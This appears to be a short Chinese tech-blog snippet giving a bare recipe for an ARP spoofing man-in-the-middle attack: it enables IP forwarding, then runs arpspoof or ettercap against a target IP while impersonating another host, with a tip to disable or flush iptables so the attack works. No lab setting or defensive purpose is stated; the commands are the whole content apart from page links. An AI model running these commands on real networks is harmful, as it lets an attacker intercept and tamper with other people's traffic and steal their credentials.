sudo sysctl -w net.ipv4.ip_forward=1
sudo sysctl -p

arpspoof -i eth0 -t 目标ip -r 伪装ip
或者
ettercap -i eth0 -Tq -M arp:remote //目标ip// //伪装ip// 注意,一定要关闭iptables,或者清空规则,坑爹的

 

相关文章:

  • 2021-09-18
  • 2021-04-26
  • 2021-12-25
  • 2022-12-23
猜你喜欢
  • 2021-09-05
  • 2021-07-24
相关资源
相似解决方案